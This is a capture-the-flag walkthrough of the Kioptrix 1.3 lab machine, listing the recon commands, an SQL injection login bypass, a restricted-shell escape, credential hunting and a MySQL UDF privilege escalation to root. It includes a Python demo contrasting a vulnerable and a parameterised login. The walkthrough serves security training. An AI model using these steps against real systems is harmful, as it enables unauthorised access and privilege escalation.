VulnHub: Kioptrix: Level 1.3 (#4)

1. Network Discovery

nmap -sn

The machine ‘’ is the target.

2. Port scan

nmap -Pn -p1000-

There are 4 open ports: 22, 80, 139, 445.

3. OS and service scan

nmap -p 22,80,139,445 -A

4. Vuln scan

nmap -p 22,80,139,445 --script vuln

5. Nikto scan

nikto -h

6. Samba scan

nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse

7. Access HTTP on port 80

View page source

Access directories

I found a username and password in database.sql.

Try them in the login form

username: john
password: 1234

8. SQL injection

Username - ' or '1'='1
Password - ' or '1'='1

Another try with john

Username - john
Password - ' or '1'='1

Now, I have a username and password.
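As an added example (not the code of the machine's checklogin.php, which the walkthrough does not reproduce), the following models why the `' or '1'='1` payload above logs in and how a parameterised query stops it. It stands in for the PHP/MySQL app with an in-memory sqlite3 table of constructed rows.

```python
import sqlite3

# Constructed sample rows; not the contents of the machine's database.sql.
USERS = [("john", "1234"), ("robert", "hunter2")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO members VALUES (?, ?)", USERS)
    return conn


def login_vulnerable(conn, username, password):
    # Classic checklogin.php style: user input spliced straight into the SQL text.
    # With password = ' or '1'='1 the WHERE clause becomes
    #   username='john' AND password='' or '1'='1'
    # and the trailing tautology matches every row.
    sql = ("SELECT username FROM members WHERE username='%s' AND password='%s'"
           % (username, password))
    return conn.execute(sql).fetchone() is not None


def login_hardened(conn, username, password):
    # Parameterised query: the driver binds the input as data, so the quote
    # and the OR are compared literally against the stored password.
    sql = "SELECT username FROM members WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def demo():
    # Returns the outcome of the walkthrough's two attempts against each login.
    conn = make_db()
    payload = "' or '1'='1"
    return {
        "vuln_valid": login_vulnerable(conn, "john", "1234"),
        "vuln_tautology": login_vulnerable(conn, "john", payload),
        "hard_valid": login_hardened(conn, "john", "1234"),
        "hard_tautology": login_hardened(conn, "john", payload),
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {'login OK' if ok else 'rejected'}")
```

The hardened version still accepts john's real password; only the tautology stops working.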

9. Access via SSH

ssh john@

Type ? to list the commands I can use.

I need a TTY shell.

echo os.system('/bin/bash')

whoami
pwd
ls -la

10. Data hunting and exploitation

cat /etc/passwd

There are 3 users.

Verify passwd permission

ls -la /etc/passwd

It belongs to root.

Verify shadow permission

ls -la /etc/shadow

It belongs to root.

cd /home/loneferret
ls -la

Nothing much useful.

cd /home/robert
ls -la

Nothing much useful.

Since I know the HTTP site is connected to MySQL, I assumed there must be a database username and password stored somewhere.

I found them in /var/www/checklogin.php

Verify sudo

sudo -l

Verify SUID

find / -perm -u=s -type f 2>/dev/null

getcap -r / 2>/dev/null

Cron job

cat /etc/crontab

Running service

ps aux | grep "^root"

There's a MySQL process running as root, and I have its username and password.

Verify version

mysql --version

I can use a UDF (user-defined function).

Verify gcc for further compiling

which gcc

I don't have gcc.

Maybe there's already a UDF library on the system; search for it.

find / 2>>/dev/null | grep -i "udf"

Connect to mysql

mysql -u root -p

I will modify the current user, john, so that he can run sudo commands.

use mysql;
select sys_exec('usermod -a -G admin john');
exit

sudo -l

Change to root

sudo su -

Now I’m root.